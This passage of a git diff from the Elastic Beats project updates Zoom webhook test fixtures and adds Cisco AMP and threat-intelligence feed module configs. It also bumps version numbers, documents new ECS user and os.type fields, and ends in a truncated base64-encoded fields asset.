"zoom-webhook", "forwarded" ], + "user.email": "coolemail@email.com", + "user.full_name": "Cool Person", + "user.id": "U0BBBBBBBBBBfrUz1Q", "zoom.account_id": "lAAAAAAAAAAAAA", "zoom.registrant.address": "", "zoom.registrant.city": "", @@ -383,13 +399,17 @@ "observer.vendor": "Zoom", "related.user": [ "Lobbbbbbbbbb_qQsQ", - "uLobbbbbbbbbb_qQsQ" + "uLobbbbbbbbbb_qQsQ", + "U0BBBBBBBBBBfrUz1Q" ], "service.type": "zoom", "tags": [ "zoom-webhook", "forwarded" ], + "user.email": "coolemail@email.com", + "user.full_name": "Cool Person", + "user.id": "U0BBBBBBBBBBfrUz1Q", "zoom.account_id": "lAAAAAAAAAAAAA", "zoom.operator": "somemail@email.com", "zoom.operator_id": "Lobbbbbbbbbb_qQsQ", @@ -425,13 +445,17 @@ "observer.product": "Webhook", "observer.vendor": "Zoom", "related.user": [ - "uLobbbbbbbbbb_qQsQ" + "uLobbbbbbbbbb_qQsQ", + "U0BBBBBBBBBBfrUz1Q" ], "service.type": "zoom", "tags": [ "zoom-webhook", "forwarded" ], + "user.email": "coolemail@email.com", + "user.full_name": "Cool Person", + "user.id": "U0BBBBBBBBBBfrUz1Q", "zoom.account_id": "lAAAAAAAAAAAAA", "zoom.operator": "coolemail@email.com", "zoom.registrant.email": "coolemail@email.com", @@ -465,13 +489,17 @@ "observer.product": "Webhook", "observer.vendor": "Zoom", "related.user": [ - "uLobbbbbbbbbb_qQsQ" + "uLobbbbbbbbbb_qQsQ", + "U0BBBBBBBBBBfrUz1Q" ], "service.type": "zoom", "tags": [ "zoom-webhook", "forwarded" ], + "user.email": "coolemail@email.com", + "user.full_name": "Cool Person", + "user.id": "U0BBBBBBBBBBfrUz1Q", "zoom.account_id": "lAAAAAAAAAAAAA", "zoom.operator": "coolemail@email.com", "zoom.registrant.email": "coolemail@email.com", @@ -504,13 +532,16 @@ "observer.product": "Webhook", "observer.vendor": "Zoom", "related.user": [ - "uLoRgfbbTayCX6r2Q_qQsQ" + "uLoRgfbbTayCX6r2Q_qQsQ", + "iFxeBPYun6SAiWUzBcEkX" ], "service.type": "zoom", "tags": [ "zoom-webhook", "forwarded" ], + "user.full_name": "shree", + "user.id": "iFxeBPYun6SAiWUzBcEkX", "zoom.account_id": "o8KK_AAACq6BBEyA70CA", "zoom.operator": "someemail@email.com", "zoom.participant.id": "iFxeBPYun6SAiWUzBcEkX", @@ -543,13 +574,16 @@ "observer.product": "Webhook", "observer.vendor": "Zoom", "related.user": [ - "uLoRgfbbTayCX6r2Q_qQsQ" + "uLoRgfbbTayCX6r2Q_qQsQ", + "iFxeBPYun6SAiWUzBcEkX" ], "service.type": "zoom", "tags": [ "zoom-webhook", "forwarded" ], + "user.full_name": "shree", + "user.id": "iFxeBPYun6SAiWUzBcEkX", "zoom.account_id": "o8KK_AAACq6BBEyA70CA", "zoom.operator": "someemail@email.com", "zoom.participant.id": "iFxeBPYun6SAiWUzBcEkX", diff --git a/x-pack/filebeat/module/zscaler/zia/config/input.yml b/x-pack/filebeat/module/zscaler/zia/config/input.yml index c24ac2c43d08..cf61c0a28f7d 100644 --- a/x-pack/filebeat/module/zscaler/zia/config/input.yml +++ b/x-pack/filebeat/module/zscaler/zia/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/modules.d/cisco.yml.disabled b/x-pack/filebeat/modules.d/cisco.yml.disabled index fedb2c03d093..6a9336103367 100644 --- a/x-pack/filebeat/modules.d/cisco.yml.disabled +++ b/x-pack/filebeat/modules.d/cisco.yml.disabled @@ -123,3 +123,20 @@ #var.visibility_timeout: 300s # Maximum duration before AWS API request will be interrupted #var.api_timeout: 120s + + amp: + enabled: true + + # Set which input to use between httpjson (default) or file. + #var.input: httpjson + + # The API URL + #var.url: https://api.amp.cisco.com/v1/events + # The client ID used as a username for the API requests. + #var.client_id: + # The API key related to the client ID. + #var.api_key: + # How far to look back the first time the module is started. Expects an amount of hours. + #var.first_interval: 24h + # Overriding the default request timeout, optional. + #var.request_timeout: 60s diff --git a/x-pack/filebeat/modules.d/threatintel.yml.disabled b/x-pack/filebeat/modules.d/threatintel.yml.disabled new file mode 100644 index 000000000000..3e03fee654f7 --- /dev/null +++ b/x-pack/filebeat/modules.d/threatintel.yml.disabled @@ -0,0 +1,97 @@ +# Module: threatintel +# Docs: https://www.elastic.co/guide/en/beats/filebeat/master/filebeat-module-threatintel.html + +- module: threatintel + abuseurl: + enabled: true + + # Input used for ingesting threat intel data. + var.input: httpjson + + # The URL used for Threat Intel API calls. + var.url: https://urlhaus-api.abuse.ch/v1/urls/recent/ + + # The interval to poll the API for updates. + var.interval: 60m + + abusemalware: + enabled: true + + # Input used for ingesting threat intel data. + var.input: httpjson + + # The URL used for Threat Intel API calls. + var.url: https://urlhaus-api.abuse.ch/v1/payloads/recent/ + + # The interval to poll the API for updates. + var.interval: 60m + + misp: + enabled: true + + # Input used for ingesting threat intel data, defaults to JSON. + var.input: httpjson + + # The URL of the MISP instance, should end with "/events/restSearch". + var.url: https://SERVER/events/restSearch + + # The authentication token used to contact the MISP API. Found when looking at user account in the MISP UI. + var.api_token: API_KEY + + # Optional filters that can be applied to the API for filtering out results. This should support the majority of fields in a MISP context. + # For examples please reference the filebeat module documentation. + #var.filters: + # - threat_level: [4, 5] + # - to_ids: true + + # How far back to look once the beat starts up for the first time, the value has to be in hours. Each request afterwards will filter on any event newer + # than the last event that was already ingested. + var.first_interval: 24h + + # The interval to poll the API for updates. + var.interval: 60m + + otx: + enabled: true + + # Input used for ingesting threat intel data + var.input: httpjson + + # The URL used for OTX Threat Intel API calls. + var.url: https://otx.alienvault.com/api/v1/indicators/export + + # The authentication token used to contact the OTX API, can be found on the OTX UI. + var.api_token: API_KEY + + # Optional filters that can be applied to retrieve only specific indicators. + #var.types: "domain,IPv4,hostname,url,FileHash-SHA256" + + # How many hours to look back for each request, should be close to the configured interval. Deduplication of events is handled by the module. + var.lookback_range: 2h + + # How far back to look once the beat starts up for the first time, the value has to be in hours. + var.first_interval: 24h + + # The interval to poll the API for updates + var.interval: 60m + + anomali: + enabled: true + + # Input used for ingesting threat intel data + var.input: httpjson + + # The URL used for Threat Intel API calls. + var.url: https://limo.anomali.com/api/v1/taxii2/feeds/collections/41/objects + + # The Username used by anomali Limo, defaults to guest. + #var.username: guest + + # The password used by anomali Limo, defaults to guest. + #var.password: guest + + # How far back to look once the beat starts up for the first time, the value has to be in hours. + var.first_interval: 24h + + # The interval to poll the API for updates + var.interval: 60m diff --git a/x-pack/filebeat/modules.d/zeek.yml.disabled b/x-pack/filebeat/modules.d/zeek.yml.disabled index 5e0854908952..feacbf939d6a 100644 --- a/x-pack/filebeat/modules.d/zeek.yml.disabled +++ b/x-pack/filebeat/modules.d/zeek.yml.disabled @@ -23,7 +23,7 @@ http: enabled: true intel: - enabled: true + enabled: true irc: enabled: true kerberos: @@ -46,6 +46,8 @@ enabled: true rfb: enabled: true + signature: + enabled: true sip: enabled: true smb_cmd: diff --git a/x-pack/functionbeat/Dockerfile b/x-pack/functionbeat/Dockerfile index 77daddd7a86c..53950aa33b69 100644 --- a/x-pack/functionbeat/Dockerfile +++ b/x-pack/functionbeat/Dockerfile @@ -1,4 +1,4 @@ -FROM golang:1.15.7 +FROM golang:1.15.8 RUN \ apt-get update \ diff --git a/x-pack/functionbeat/Jenkinsfile.yml b/x-pack/functionbeat/Jenkinsfile.yml index ec9a4ec57f09..c6cb19ddcf6c 100644 --- a/x-pack/functionbeat/Jenkinsfile.yml +++ b/x-pack/functionbeat/Jenkinsfile.yml @@ -76,3 +76,7 @@ stages: mage: "mage build unitTest" platforms: ## override default labels in this specific stage. - "windows-7-32-bit" + packaging-linux: + packaging-linux: "mage package" + e2e: + enabled: false diff --git a/x-pack/functionbeat/docs/fields.asciidoc b/x-pack/functionbeat/docs/fields.asciidoc index d3eef749804c..4da5e8283925 100644 --- a/x-pack/functionbeat/docs/fields.asciidoc +++ b/x-pack/functionbeat/docs/fields.asciidoc @@ -2040,7 +2040,7 @@ example: apache + -- Raw text message of entire event. Used to demonstrate log integrity. -This field is not indexed and doc_values are disabled. It cannot be searched, but it can be retrieved from `_source`. +This field is not indexed and doc_values are disabled. It cannot be searched, but it can be retrieved from `_source`. If users wish to override this and index this field, consider using the wildcard data type. type: keyword @@ -2093,7 +2093,7 @@ example: Terminated an unexpected process + -- Reference URL linking to additional information about this event. -This URL links to a static definition of the this event. Alert events, indicated by `event.kind:alert`, are a common use case for this field. +This URL links to a static definition of this event. Alert events, indicated by `event.kind:alert`, are a common use case for this field. type: keyword @@ -3284,6 +3284,19 @@ example: darwin -- +*`host.os.type`*:: ++ +-- +Use the `os.type` field to categorize the operating system into one of the broad commercial families. +One of these following values should be used (lowercase): linux, macos, unix, windows. +If the OS you're dealing with is not in the list, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. + +type: keyword + +example: macos + +-- + *`host.os.version`*:: + -- @@ -4358,6 +4371,19 @@ example: darwin -- +*`observer.os.type`*:: ++ +-- +Use the `os.type` field to categorize the operating system into one of the broad commercial families. +One of these following values should be used (lowercase): linux, macos, unix, windows. +If the OS you're dealing with is not in the list, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. + +type: keyword + +example: macos + +-- + *`observer.os.version`*:: + -- @@ -4528,6 +4554,19 @@ example: darwin -- +*`os.type`*:: ++ +-- +Use the `os.type` field to categorize the operating system into one of the broad commercial families. +One of these following values should be used (lowercase): linux, macos, unix, windows. +If the OS you're dealing with is not in the list, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. + +type: keyword + +example: macos + +-- + *`os.version`*:: + -- @@ -7679,6 +7718,7 @@ URL fields provide support for complete or partial URLs, and supports the breaki -- Domain of the url, such as "www.elastic.co". In some cases a URL may refer to an IP and/or port directly, without a domain name. In this case, the IP address would go to the `domain` field. +If the URL contains a literal IPv6 address enclosed by `[` and `]` (IETF RFC 2732), the `[` and `]` characters should also be captured in the `domain` field. type: keyword @@ -7854,6 +7894,119 @@ The user fields describe information about the user that is relevant to the even Fields can have one entry or multiple entries. If a user has more than one id, provide an array that includes all of them. +*`user.changes.domain`*:: ++ +-- +Name of the directory the user is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.changes.email`*:: ++ +-- +User email address. + +type: keyword + +-- + +*`user.changes.full_name`*:: ++ +-- +User's full name, if available. + +type: keyword + +example: Albert Einstein + +-- + +*`user.changes.full_name.text`*:: ++ +-- +type: text + +-- + +*`user.changes.group.domain`*:: ++ +-- +Name of the directory the group is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.changes.group.id`*:: ++ +-- +Unique identifier for the group on the system/platform. + +type: keyword + +-- + +*`user.changes.group.name`*:: ++ +-- +Name of the group. + +type: keyword + +-- + +*`user.changes.hash`*:: ++ +-- +Unique user hash to correlate information for a user in anonymized form. +Useful if `user.id` or `user.name` contain confidential information and cannot be used. + +type: keyword + +-- + +*`user.changes.id`*:: ++ +-- +Unique identifier of the user. + +type: keyword + +-- + +*`user.changes.name`*:: ++ +-- +Short name or login of the user. + +type: keyword + +example: albert + +-- + +*`user.changes.name.text`*:: ++ +-- +type: text + +-- + +*`user.changes.roles`*:: ++ +-- +Array of user roles at the time of the event. + +type: keyword + +example: ["kibana_admin", "reporting_user"] + +-- + *`user.domain`*:: + -- @@ -7864,6 +8017,119 @@ type: keyword -- +*`user.effective.domain`*:: ++ +-- +Name of the directory the user is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.effective.email`*:: ++ +-- +User email address. + +type: keyword + +-- + +*`user.effective.full_name`*:: ++ +-- +User's full name, if available. + +type: keyword + +example: Albert Einstein + +-- + +*`user.effective.full_name.text`*:: ++ +-- +type: text + +-- + +*`user.effective.group.domain`*:: ++ +-- +Name of the directory the group is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.effective.group.id`*:: ++ +-- +Unique identifier for the group on the system/platform. + +type: keyword + +-- + +*`user.effective.group.name`*:: ++ +-- +Name of the group. + +type: keyword + +-- + +*`user.effective.hash`*:: ++ +-- +Unique user hash to correlate information for a user in anonymized form. +Useful if `user.id` or `user.name` contain confidential information and cannot be used. + +type: keyword + +-- + +*`user.effective.id`*:: ++ +-- +Unique identifier of the user. + +type: keyword + +-- + +*`user.effective.name`*:: ++ +-- +Short name or login of the user. + +type: keyword + +example: albert + +-- + +*`user.effective.name.text`*:: ++ +-- +type: text + +-- + +*`user.effective.roles`*:: ++ +-- +Array of user roles at the time of the event. + +type: keyword + +example: ["kibana_admin", "reporting_user"] + +-- + *`user.email`*:: + -- @@ -7967,6 +8233,119 @@ example: ["kibana_admin", "reporting_user"] -- +*`user.target.domain`*:: ++ +-- +Name of the directory the user is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.target.email`*:: ++ +-- +User email address. + +type: keyword + +-- + +*`user.target.full_name`*:: ++ +-- +User's full name, if available. + +type: keyword + +example: Albert Einstein + +-- + +*`user.target.full_name.text`*:: ++ +-- +type: text + +-- + +*`user.target.group.domain`*:: ++ +-- +Name of the directory the group is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.target.group.id`*:: ++ +-- +Unique identifier for the group on the system/platform. + +type: keyword + +-- + +*`user.target.group.name`*:: ++ +-- +Name of the group. + +type: keyword + +-- + +*`user.target.hash`*:: ++ +-- +Unique user hash to correlate information for a user in anonymized form. +Useful if `user.id` or `user.name` contain confidential information and cannot be used. + +type: keyword + +-- + +*`user.target.id`*:: ++ +-- +Unique identifier of the user. + +type: keyword + +-- + +*`user.target.name`*:: ++ +-- +Short name or login of the user. + +type: keyword + +example: albert + +-- + +*`user.target.name.text`*:: ++ +-- +type: text + +-- + +*`user.target.roles`*:: ++ +-- +Array of user roles at the time of the event. + +type: keyword + +example: ["kibana_admin", "reporting_user"] + +-- + [float] === user_agent @@ -8083,6 +8462,19 @@ example: darwin -- +*`user_agent.os.type`*:: ++ +-- +Use the `os.type` field to categorize the operating system into one of the broad commercial families. +One of these following values should be used (lowercase): linux, macos, unix, windows. +If the OS you're dealing with is not in the list, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. + +type: keyword + +example: macos + +-- + *`user_agent.os.version`*:: + -- diff --git a/x-pack/functionbeat/include/fields.go b/x-pack/functionbeat/include/fields.go index 8b3b7c24a1e7..5ff059a6edda 100644 --- a/x-pack/functionbeat/include/fields.go +++ b/x-pack/functionbeat/include/fields.go @@ -19,5 +19,5 @@ func init() { // AssetFieldsYml returns asset data. // This is the base64 encoded gzipped contents of fields.yml. func AssetFieldsYml() string { - return "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